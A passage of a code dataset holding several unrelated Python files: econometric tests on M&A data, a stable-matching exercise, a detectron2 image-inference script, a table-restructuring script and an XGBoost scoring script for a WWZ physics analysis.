'*' if p_value < 0.10 else ''\n\n\ncorr_cols = [\n 'CAR1',\n 'CAR3',\n 'CAR5',\n 't1-t-1',\n 't2-t-1',\n 't3-t-1',\n 'PE_YES',\n 'PE_TIME',\n 'PE_UNITED',\n 'PE_REP',\n 'STATE_OVER_PE_RATIO',\n 'RELATIVE SIZE',\n 'CASHPAY',\n 'LN_ASSET',\n 'LEV',\n 'BROE',\n 'GROWTH',\n 'FCFF',\n 'BLOCK',\n 'STATE',\n]\ncorr_star_df = pd.DataFrame(index=corr_cols, columns=corr_cols)\nfor i in range(len(corr_cols)):\n for j in range(i + 1):\n col_1 = corr_cols[i]\n col_2 = corr_cols[j]\n corr, p_value = stats.pearsonr(df[col_1], df[col_2])\n stars = '' if i == j else get_stars(p_value)\n corr_star_df.loc[col_1, col_2] = f'{corr:.3f}{stars}'\ncorr_star_df.to_excel(output_io, 
'相关性分析', startrow=0, startcol=0, index_label='相关系数')\n\n\ndef plot_corr_matrix(corr_df, cmap='GnBu'):\n \"\"\"绘制xs相关系数矩阵热力图\"\"\"\n fig, ax = plt.subplots(1, 1, figsize=(8, 8))\n sns.heatmap(data=corr_df, ax=ax, cmap=cmap, square=True) # type: plt.Axes\n ax.set_title('相关系数热力图')\n fig.tight_layout()\n fig.savefig('相关系数热力图.png', dpi=300, quality=100)\n\n\ncorr_df = df[corr_cols].corr()\nrename_dict = {\n 't1-t-1': 'F1-F-1',\n 't2-t-1': 'F2-F-1',\n 't3-t-1': 'F3-F-1',\n}\ncorr_df = corr_df.rename(columns=rename_dict, index=rename_dict)\nplot_corr_matrix(corr_df, cmap='Blues')\n\n\n# %% 添加哑变量\ndef get_dummy(ind):\n \"\"\"生成哑变量,以最后一个为基准\"\"\"\n ohe = OneHotEncoder(categories='auto')\n ohe.fit(ind)\n return ohe.transform(ind).toarray()[:, :-1]\n\n\ndef creat_df_with_dummy(df):\n \"\"\"创建带有dummy的数据\"\"\"\n new_df = df.copy()\n # 行业哑变量\n ind_ohe_trans = get_dummy(new_df['INDU'].values.reshape((-1, 1)))\n for i in range(ind_ohe_trans.shape[1]):\n new_df['IND_{}'.format(i)] = ind_ohe_trans[:, i]\n # 年度哑变量\n year_ohe_trans = get_dummy(new_df['YEAR'].values.reshape((-1, 1)))\n for i in range(year_ohe_trans.shape[1]):\n new_df['YEAR_{}'.format(i)] = year_ohe_trans[:, i]\n return (\n new_df,\n ['IND_{}'.format(i) for i in range(ind_ohe_trans.shape[1])],\n ['YEAR_{}'.format(i) for i in range(year_ohe_trans.shape[1])],\n )\n\n\n# 创建哑变量\ndf, ind_dummy, year_dummy = creat_df_with_dummy(df)\ndf_mask, ind_dummy_mask, year_dummy_mask = creat_df_with_dummy(df[df['PE_YES'] == 1].reset_index())\n\n\n# %% 异方差检验\ndef het_test(y, xs):\n \"\"\"回归\"\"\"\n # 构建最小二乘模型并拟合\n xs = sm.add_constant(xs) # 截距\n model = sm.OLS(y, xs)\n res = model.fit()\n # White`s Test\n White_res = sm.stats.diagnostic.het_white(res.resid, model.exog)\n # BP Test\n BP_res = sm.stats.diagnostic.het_breuschpagan(res.resid, model.exog)\n return np.array(White_res), np.array(BP_res)\n\n\nctrl = [\n 'RELATIVE SIZE', 'CASHPAY', 'LN_ASSET',\n 'LEV', 'BROE', 'GROWTH',\n 'FCFF', 'BLOCK', 'STATE',\n]\nchar = [\n 'PE_TIME', 'PE_UNITED',\n 'PE_REP', 'STATE_OVER_PE_RATIO'\n]\ny_cols = ['t1-t-1', 't2-t-1', 't3-t-1', 'CAR1', 'CAR3', 'CAR5']\nx_cols = ['PE_YES'] + ctrl + ind_dummy + year_dummy\nx_cols_mask = char + ctrl + ind_dummy_mask + year_dummy_mask\nhet_test_df = pd.DataFrame(\n columns=y_cols,\n index=pd.MultiIndex.from_product([['模型1', '模型2'], ['White', 'BP'], ['lm', 'lm_p_value', 'f_value', 'f_p_value']])\n)\nfor col in y_cols:\n # 第一个模型\n het_test_df.loc[('模型1', 'White'), col], \\\n het_test_df.loc[('模型1', 'BP'), col] = het_test(y=df[col], xs=df[x_cols])\n # 第二个模型\n het_test_df.loc[('模型2', 'White'), col], \\\n het_test_df.loc[('模型2', 'BP'), col] = het_test(y=df_mask[col], xs=df_mask[x_cols_mask])\nhet_test_df.to_excel(output_io, '异方差检验', startrow=0, startcol=0, index_label='异方差检验')\n\n# %% 多重共线性检验\nvif_x_cols_1 = ['CONS', 'PE_YES'] + ctrl\nvif_x_cols_2 = ['CONS'] + char + ctrl\nmulti_test_df = pd.DataFrame(\n index=['CONS', 'PE_YES'] + char + ctrl,\n columns=['模型1', '模型2'],\n)\ndf['CONS'] = 1\ndf_mask['CONS'] = 1\nmulti_test_df.loc[vif_x_cols_1, '模型1'] = np.array([\n variance_inflation_factor(df[vif_x_cols_1].values, i) for i in range(len(vif_x_cols_1))\n])\nmulti_test_df.loc[vif_x_cols_2, '模型2'] = np.array([\n variance_inflation_factor(df_mask[vif_x_cols_2].values, i) for i in range(len(vif_x_cols_2))\n])\nmulti_test_df.name = 'VIF'\nmulti_test_df.to_excel(output_io, '多重共线性检验', startrow=0, startcol=0, index_label='多重共线性检验')\n\n# %% 
储存\noutput_io.save()\n","sub_path":"describe.py","file_name":"describe.py","file_ext":"py","file_size_in_byte":8280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"156226650","text":"teacher_name = []\nstudent_name = []\n\nstudent_dict = {}\nteacher_dict = {}\n\npeople_num = 0\n\nstudent_list = []\nteacher_list = []\n\nans = {}\n\nfirst = input().split(',')\nfor i in first:\n teacher_name.append(i)\n people_num += 1\nstudent_list = [first]\n\nfor i in range(people_num - 1):\n n = input().split(',')\n student_list.append(n)\n\nfor j in range(people_num):\n n = input().split(',')\n teacher_list.append(n)\n\nfor j in teacher_list[0]:\n student_name.append(j)\nstudent_name = sorted(student_name)\nteacher_name = sorted(teacher_name)\n\nj = 0\nfor i in student_name:\n student_dict[i] = student_list[j]\n j += 1\n\nj = 0\nfor i in teacher_name:\n teacher_dict[i] = teacher_list[j]\n j += 1\n\n\n#print(student_dict)\n#print(teacher_dict)\n\n# order = 志願序位 int\n# todo = 待排學生 list\n# teacher = 空餘教授 list\ndef find(order, todo, teacher):\n #print(\"order\",order,\"todo\",todo,\"teacher\",teacher,sep = '\\n')\n #print(\"-----------\")\n #print(teacher_name)\n order_num = {}\n next_todo = todo\n for stu in todo:\n # stu 學生, 第 order 個志願序\n if student_dict[stu][order] in order_num:\n order_num[student_dict[stu][order]][0] += 1\n order_num[student_dict[stu][order]][1].append(stu)\n else:\n order_num[student_dict[stu][order]] = [1, [stu]]\n \n #print(\"order_num\",order_num,sep = '\\n')\n for teach in order_num:\n #print(\"-----------\")\n #print(teacher_name)\n #print(teach,order_num[teach])\n if teach in teacher:\n if order_num[teach][0] == 1:\n ans[order_num[teach][1][0]] = teach\n next_todo.remove(order_num[teach][1][0])\n #print(teach,order_num[teach])\n #print(teach, teacher)\n teacher.remove(teach)\n \n else:\n flag = 0\n for j in teacher_dict[teach]:\n for k in range(len(order_num[teach][1])):\n if j == order_num[teach][1][k] :\n ans[order_num[teach][1][k]] = teach\n next_todo.remove(order_num[teach][1][k])\n #print(teach,order_num[teach])\n #print(j,k,order_num[teach][1][k])\n #print(teach, teacher)\n teacher.remove(teach)\n flag = 1\n break\n if flag == 1:\n break\n if len(next_todo) != 0:\n find(order+1, next_todo, teacher)\n else:\n #print(student_name)\n for student in student_name:\n print(student,ans[student],sep = '->')\n\nfind(0, student_name.copy(), teacher_name.copy())\n# 100 finish","sub_path":"week_1/38.py","file_name":"38.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"374709032","text":"import detectron2\nfrom detectron2.utils.logger import setup_logger\nsetup_logger()\n\n# import some common libraries\nimport numpy as np\nimport os, json, cv2, random\n\nfrom detectron2 import model_zoo\nfrom detectron2.engine import DefaultPredictor\nfrom detectron2.config import get_cfg\nfrom detectron2.utils.visualizer import Visualizer\nfrom detectron2.data import MetadataCatalog, DatasetCatalog\nimport time\n\n\ndef frameProcessing(im, predictor, Visualizer, cfg):\n tick0 = time.time()\n outputs = predictor(im)\n tick1 = time.time()\n\n v = Visualizer(im[:, :, ::-1], MetadataCatalog.get(cfg.DATASETS.TRAIN[0]), scale=1.2)\n out = v.draw_instance_predictions(outputs[\"instances\"].to(\"cpu\"))\n cv_bgr = out.get_image()[:, :, ::-1]\n tick2 = time.time()\n print(tick1 - tick0, tick2 - tick1)\n return cv_bgr\n\ndef main(imagePath):\n \n im = 
cv2.imread(imagePath)\n\n cfg = get_cfg()\n # add project-specific config (e.g., TensorMask) here if you're not running a model in detectron2's core library\n cfg.merge_from_file(model_zoo.get_config_file(\"COCO-Detection/faster_rcnn_R_50_FPN_3x.yaml\"))\n cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5 # set threshold for this model\n # Find a model from detectron2's model zoo. You can use the https://dl.fbaipublicfiles... url as well\n cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(\"COCO-Detection/faster_rcnn_R_50_FPN_3x.yaml\")\n predictor = DefaultPredictor(cfg)\n cv_bgr = None\n for i in range(5):\n \n cv_bgr = frameProcessing(im, predictor, Visualizer, cfg)\n\n cv2.namedWindow('input', cv2.WINDOW_NORMAL)\n cv2.namedWindow('output', cv2.WINDOW_NORMAL)\n\n cv2.imshow('input' ,im)\n cv2.imshow('output', cv_bgr)\n cv2.waitKey()\n cv2.destroyAllWindows()\n \n \nif __name__=='__main__':\n\n imagePath = './dog.jpg'\n main(imagePath)\n","sub_path":"inference_image.py","file_name":"inference_image.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"579532134","text":"import sys\nfrom pandas import DataFrame\n# 从公共模块中导入读取类,删除类,写入类\nfrom means import Read, Write, Delete\n\n'''执行方法:python pro1v2.py problem1.pk aim_name.pk'''\n\n\ndef find(div, num, key):\n \"\"\"\n div:DataFrame\n num:col值\n key:(0,1) == (div_cc,div_c_t)\n \"\"\"\n list1 = []\n # 寻到的index值都注入到列表中,通过判断len(list)来得出结论\n if key == 0:\n col = 'id_div'\n elif key == 1:\n col = 'id_div_cc'\n for i in div.index:\n if div.loc[i, col] == num:\n list1.append(i)\n return list1\n\n\ndef judge(i, div_tt):\n for k in div_tt['id_div']:\n if k == i:\n return False\n return True\n\n\ndef print_info(div, div2, div_cc, div_tt):\n print(\"div:%d, div2:%d, div_cc:%d, div_tt:%d\" % (len(div), len(div2), len(div_cc),len(div_tt)))\n\n\ndef main():\n file_name = sys.argv[1]\n aim_name = sys.argv[2]\n # 实例化读取类\n read = Read(file_name)\n # 解包接收返回的结果\n div, div_cc, div_tt, div_c_t, div2, div_cc2, div_c_t2 = read.read()\n print_info(div, div2, div_cc, div_tt)\n print('统计每个div_cc里面包含有多少个div_c_t的结果:')\n while True:\n flag = 0\n for i in div2.index:\n # i 代表了div2里面的index:id_div\n if div2.loc[i, 'x_value'] < 10 and judge(i, div_tt): # 选出需要拆分的div_cc标签对应的id_div为 i\n flag = 1 # 修改标志值,说明还进去处理过了\n count = 0\n '''根据id_div找出对应的div_cc,再根据div_cc找出对应的div_c_t(可能有多个)'''\n id_div = i\n\n # 需要提前把需要用到的(div,div2里面的值读出来)\n id_page = div.loc[id_div, 'id_page']\n x_value = div2.loc[id_div, 'x_value']\n y_value = div2.loc[id_div, 'y_value']\n\n # 返回的list一定只有一个值,因为id_div,id_div_cc是一一对应的\n id_div_cc = find(div_cc, id_div, 0)[0]\n id_div_c_t_list = find(div_c_t, id_div_cc, 1)\n sum1 = len(id_div_c_t_list)\n # 输出每个div_cc里面包含的div_c_t的个数,用于检测调试\n print(' ' + str(sum1) + ' ', end='')\n\n for j in id_div_c_t_list:\n '''得到的每一个 j 都是id_div_c_t'''\n count = count + 1\n if count == 1:\n '''说明此时处理的是div_cc里面的第一个div_c_t'''\n c_t_x = div_c_t2.loc[j, 'x_value']\n c_t_y = div_c_t2.loc[j, 'y_value']\n # c_t_x = div_c_t2['x_value'][i]\n # c_t_y = div_c_t2['y_value'][i]\n # 更新div2里面的值,写入div_tt里面一条记录\n div2.loc[id_div, 'x_value'] = x_value + c_t_x\n div2.loc[id_div, 'y_value'] = y_value + c_t_y\n # 给div_tt添加映射id_div\n div_tt = div_tt.append(DataFrame({'id_div': [id_div]}), ignore_index=True)\n elif (count <= sum1) and (count > 1):\n id_div += 1\n '''这样的限定条件暗示了不是第一个div_c_t了'''\n c_t_x = div_c_t2.loc[j, 'x_value']\n c_t_y = div_c_t2.loc[j, 'y_value']\n\n for k in range(len(div2), id_div, -1):\n div2.loc[k, 
'x_value'] = div2.loc[k - 1, 'x_value']\n div2.loc[k, 'y_value'] = div2.loc[k - 1, 'y_value']\n\n # 给id_div指定的那一行赋值\n div2.loc[id_div, 'x_value'] = x_value + c_t_x\n div2.loc[id_div, 'y_value'] = y_value + c_t_y\n\n # 本质上向下移动了一行,会导致一部分的div_cc的id_div变大了1,所以针对\n # div_cc表,对于所有id_div>=我们本次添加的id_div,需要给他们多加1才可以。\n\n # 对div_cc的id_div进行修改\n for k in div_cc.index:\n if div_cc.loc[k, 'id_div'] >= id_div:\n div_cc.loc[k, 'id_div'] += 1\n\n # 给div表添加一个数据(id_div,id_page)\n # div表和div2表在index上应该是完全一致的\n for k in range(len(div), id_div, -1):\n div.loc[k, 'id_page'] = div.loc[k - 1, 'id_page']\n div.loc[id_div, 'id_page'] = id_page\n\n # 给div_tt添加数据,这是最简单的了\n div_tt = div_tt.append(DataFrame({'id_div': [id_div]}), ignore_index=True)\n\n if flag == 0:\n break\n\n # 下面就是解决删除问题:\n '''\n 1. 首先确定指标问题:我以什么为标准进行删除\n 2. 遍历div_tt里面的的id_div,明确里面的内容,有div_cc直接改为div_tt的,也有多余的div_c_t添加到div_tt里面的,\n 3. div_tt里面的id_div与div_cc里面的id_div是交集关系,相交的那一部分就是我们要删除的div_cc对应的id_div\n\n '''\n # 实例化删除类\n div_del = Delete(div_cc, div_c_t, div_cc2, div_c_t2, div_tt)\n div_cc, div_cc2, div_c_t, div_c_t2 = div_del.div_del()\n print('删除执行完毕,最终统计结果为:')\n print_info(div, div2, div_cc, div_tt)\n\n # 实例化重写文件类\n # 在主函数的开始我们就已经获取了aim_name\n id_frm = {'div': div, 'div_cc': div_cc, 'div_tt': div_tt, 'div_c_t': div_c_t}\n feature_frm = {'div': div2, 'div_cc': div_cc2, 'div_c_t': div_c_t2}\n write = Write(aim_name, id_frm, feature_frm)\n write.write()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"面试题/pro1v2.py","file_name":"pro1v2.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"585466394","text":"#!/usr/bin/env python\n\nimport matplotlib.pyplot as plt\nimport xgboost as xgb\nimport numpy as np\nimport pandas as pd\nimport math\nimport pickle as pickle\nimport ROOT as root\nimport uproot\n\nimport sys, os\n\n#################\n##Preliminaries\n#################\n\nroot.gROOT.Reset()\n\nif __name__ == \"__main__\":\n\t#plotDir = \"/home/users/zhicaiz/public_html/WWZ/BDT/\"\n\tplotDir = \"../plots/\"\n\tos.system(\"mkdir -p \"+plotDir)\n\t\n\tfileDir = sys.argv[1]\n\tsample = sys.argv[2]\n\tfilterBDTvariables = \"yes\"\n\tmkplot = \"yes\"\n\tif len(sys.argv) > 3:\n\t\tmkplot = sys.argv[3]\n\tif len(sys.argv) > 4:\n\t\tfilterBDTvariables = sys.argv[4]\n\n\tFileName = fileDir + \"/\" + sample\n\tos.system(\"mkdir -p \"+fileDir+\".BDT\")\n\n\tFile = root.TFile(FileName)\n\tTree = File.Get('t')\n\tif Tree.GetEntries() < 1:\n\t\tos.system(\"cp \"+FileName+\" \"+fileDir+\".BDT/\"+sample)\t\n\t\tsys.exit(0)\n\n\tNevents = File.Get('h_neventsinfile')\n\n\t##Define variables to be used\n\tvariables_ttzzz_bVeto = ['met_pt','lep3Id','lep4Id','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\tvariables_ttzzz_emu = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\tvariables_ttzzz_OffZ = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", 
'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\tvariables_zz_emu = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis']\n\tvariables_zz_emuHighTTZBDT = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis']\n\tvariables_zz_OffZ = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis']\n\tvariables_zz_OffZHighTTZBDT = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis']\n\tvariables_ttz_nbAll = [\"nb\",\"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore', \"MllN\", \"lep3MT\", \"lep4MT\", \"lep34MT\", \"ZPt\"]\n\tvariables_ttz_bVeto = [\"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore', \"MllN\", \"lep3MT\", \"lep4MT\", \"lep34MT\", \"ZPt\"]\n\tvariables_ttz_emu = [\"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore', \"MllN\", \"lep3MT\", \"lep4MT\", \"lep34MT\", \"ZPt\"]\n\tvariables_ttz_OffZ = [\"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore', \"MllN\", \"lep3MT\", \"lep4MT\", \"lep34MT\", \"ZPt\"]\n\tvariables_multi_nbAll = ['met_pt','lep3Id','lep4Id','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", \"nb\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\tvariables_multi_emuHighTTZBDT = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\tvariables_multi_emu = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\tvariables_multi_OffZHighTTZBDT = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\tvariables_multi_OffZ = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\n\t##Getting ROOT files into 
pandas\n\tdf_ttzzz_bVeto = uproot.open(FileName)['t'].pandas.df(variables_ttzzz_bVeto, flatten=False)\n\tdf_ttzzz_emu = uproot.open(FileName)['t'].pandas.df(variables_ttzzz_emu, flatten=False)\n\tdf_ttzzz_OffZ = uproot.open(FileName)['t'].pandas.df(variables_ttzzz_OffZ, flatten=False)\n\tdf_zz_emu = uproot.open(FileName)['t'].pandas.df(variables_zz_emu, flatten=False)\n\tdf_zz_emuHighTTZBDT = uproot.open(FileName)['t'].pandas.df(variables_zz_emuHighTTZBDT, flatten=False)\n\tdf_zz_OffZ = uproot.open(FileName)['t'].pandas.df(variables_zz_OffZ, flatten=False)\n\tdf_zz_OffZHighTTZBDT = uproot.open(FileName)['t'].pandas.df(variables_zz_OffZHighTTZBDT, flatten=False)\n\tdf_ttz_nbAll = uproot.open(FileName)['t'].pandas.df(variables_ttz_nbAll, flatten=False)\n\tdf_ttz_bVeto = uproot.open(FileName)['t'].pandas.df(variables_ttz_bVeto, flatten=False)\n\tdf_ttz_emu = uproot.open(FileName)['t'].pandas.df(variables_ttz_emu, flatten=False)\n\tdf_ttz_OffZ = uproot.open(FileName)['t'].pandas.df(variables_ttz_OffZ, flatten=False)\n\tdf_multi_nbAll = uproot.open(FileName)['t'].pandas.df(variables_multi_nbAll, flatten=False)\n\tdf_multi_emuHighTTZBDT = uproot.open(FileName)['t'].pandas.df(variables_multi_emuHighTTZBDT, flatten=False)\n\tdf_multi_emu = uproot.open(FileName)['t'].pandas.df(variables_multi_emu, flatten=False)\n\tdf_multi_OffZHighTTZBDT = uproot.open(FileName)['t'].pandas.df(variables_multi_OffZHighTTZBDT, flatten=False)\n\tdf_multi_OffZ = uproot.open(FileName)['t'].pandas.df(variables_multi_OffZ, flatten=False)\n\n\n\tx_test_ttzzz_bVeto = df_ttzzz_bVeto.values\n\ty_test_ttzzz_bVeto = np.zeros(len(df_ttzzz_bVeto))\n\n\tx_test_ttzzz_emu = df_ttzzz_emu.values\n\ty_test_ttzzz_emu = np.zeros(len(df_ttzzz_emu))\n\n\tx_test_ttzzz_OffZ = df_ttzzz_OffZ.values\n\ty_test_ttzzz_OffZ = np.zeros(len(df_ttzzz_OffZ))\n\n\tx_test_zz_emu = df_zz_emu.values\n\ty_test_zz_emu = np.zeros(len(df_zz_emu))\n\n\tx_test_zz_emuHighTTZBDT = df_zz_emuHighTTZBDT.values\n\ty_test_zz_emuHighTTZBDT = np.zeros(len(df_zz_emuHighTTZBDT))\n\n\tx_test_zz_OffZ = df_zz_OffZ.values\n\ty_test_zz_OffZ = np.zeros(len(df_zz_OffZ))\n\n\tx_test_zz_OffZHighTTZBDT = df_zz_OffZHighTTZBDT.values\n\ty_test_zz_OffZHighTTZBDT = np.zeros(len(df_zz_OffZHighTTZBDT))\n\n\tx_test_ttz_nbAll = df_ttz_nbAll.values\n\ty_test_ttz_nbAll = np.zeros(len(df_ttz_nbAll))\n\n\tx_test_ttz_bVeto = df_ttz_bVeto.values\n\ty_test_ttz_bVeto = np.zeros(len(df_ttz_bVeto))\n\n\tx_test_ttz_emu = df_ttz_emu.values\n\ty_test_ttz_emu = np.zeros(len(df_ttz_emu))\n\n\tx_test_ttz_OffZ = df_ttz_OffZ.values\n\ty_test_ttz_OffZ = np.zeros(len(df_ttz_OffZ))\n\n\tx_test_multi_nbAll = df_multi_nbAll.values\n\ty_test_multi_nbAll = np.zeros(len(df_multi_nbAll))\n\n\tx_test_multi_emuHighTTZBDT = df_multi_emuHighTTZBDT.values\n\ty_test_multi_emuHighTTZBDT = np.zeros(len(df_multi_emuHighTTZBDT))\n\n\tx_test_multi_emu = df_multi_emu.values\n\ty_test_multi_emu = np.zeros(len(df_multi_emu))\n\n\tx_test_multi_OffZHighTTZBDT = df_multi_OffZHighTTZBDT.values\n\ty_test_multi_OffZHighTTZBDT = np.zeros(len(df_multi_OffZHighTTZBDT))\n\n\tx_test_multi_OffZ = df_multi_OffZ.values\n\ty_test_multi_OffZ = np.zeros(len(df_multi_OffZ))\n\t############################\n\t# get model from file\n\t############################\n\tmodel_ttzzz_bVeto = pickle.load(open('../models/model_xgb_wwz_vs_ttzzz_bVeto.pkl','rb'))\n\tmodel_ttzzz_emu = pickle.load(open('../models/model_xgb_wwz_vs_ttzzz_emu.pkl','rb'))\n\tmodel_ttzzz_OffZ = pickle.load(open('../models/model_xgb_wwz_vs_ttzzz_OffZ.pkl','rb'))\n\tmodel_zz_emu = 
pickle.load(open('../models/model_xgb_wwz_vs_zz_emu.pkl','rb'))\n\tmodel_zz_emuHighTTZBDT = pickle.load(open('../models/model_xgb_wwz_vs_zz_emuHighTTZBDT.pkl','rb'))\n\tmodel_zz_OffZ = pickle.load(open('../models/model_xgb_wwz_vs_zz_OffZ.pkl','rb'))\n\tmodel_zz_OffZHighTTZBDT = pickle.load(open('../models/model_xgb_wwz_vs_zz_OffZHighTTZBDT.pkl','rb'))\n\tmodel_ttz_nbAll = pickle.load(open('../models/model_xgb_wwz_vs_ttz_nbAll.pkl','rb'))\n\tmodel_ttz_bVeto = pickle.load(open('../models/model_xgb_wwz_vs_ttz_bVeto.pkl','rb'))\n\tmodel_ttz_emu = pickle.load(open('../models/model_xgb_wwz_vs_ttz_emu.pkl','rb'))\n\tmodel_ttz_OffZ = pickle.load(open('../models/model_xgb_wwz_vs_ttz_OffZ.pkl','rb'))\n\tmodel_multi_nbAll = pickle.load(open('../models/model_xgb_wwz_vs_multi_nbAll.pkl','rb'))\n\tmodel_multi_emuHighTTZBDT = pickle.load(open('../models/model_xgb_wwz_vs_multi_emuHighTTZBDT.pkl','rb'))\n\tmodel_multi_emu = pickle.load(open('../models/model_xgb_wwz_vs_multi_emu.pkl','rb'))\n\tmodel_multi_OffZHighTTZBDT = pickle.load(open('../models/model_xgb_wwz_vs_multi_OffZHighTTZBDT.pkl','rb'))\n\tmodel_multi_OffZ = pickle.load(open('../models/model_xgb_wwz_vs_multi_OffZ.pkl','rb'))\n\t\n\t# make predictions for test data\n\ty_pred_ttzzz_bVeto = model_ttzzz_bVeto.predict_proba(x_test_ttzzz_bVeto)[:, 1]\n\ty_pred_ttzzz_emu = model_ttzzz_emu.predict_proba(x_test_ttzzz_emu)[:, 1]\n\ty_pred_ttzzz_OffZ = model_ttzzz_OffZ.predict_proba(x_test_ttzzz_OffZ)[:, 1]\n\ty_pred_zz_emu = model_zz_emu.predict_proba(x_test_zz_emu)[:, 1]\n\ty_pred_zz_emuHighTTZBDT = model_zz_emuHighTTZBDT.predict_proba(x_test_zz_emuHighTTZBDT)[:, 1]\n\ty_pred_zz_OffZ = model_zz_OffZ.predict_proba(x_test_zz_OffZ)[:, 1]\n\ty_pred_zz_OffZHighTTZBDT = model_zz_OffZHighTTZBDT.predict_proba(x_test_zz_OffZHighTTZBDT)[:, 1]\n\ty_pred_ttz_nbAll = model_ttz_nbAll.predict_proba(x_test_ttz_nbAll)[:, 1]\n\ty_pred_ttz_bVeto = model_ttz_bVeto.predict_proba(x_test_ttz_bVeto)[:, 1]\n\ty_pred_ttz_emu = model_ttz_emu.predict_proba(x_test_ttz_emu)[:, 1]\n\ty_pred_ttz_OffZ = model_ttz_OffZ.predict_proba(x_test_ttz_OffZ)[:, 1]\n\t\n\td_test_multi_nbAll = xgb.DMatrix(x_test_multi_nbAll, label=y_test_multi_nbAll)\n\ty_pred_multi_nbAll = model_multi_nbAll.predict(d_test_multi_nbAll)\n\t\n\td_test_multi_emuHighTTZBDT = 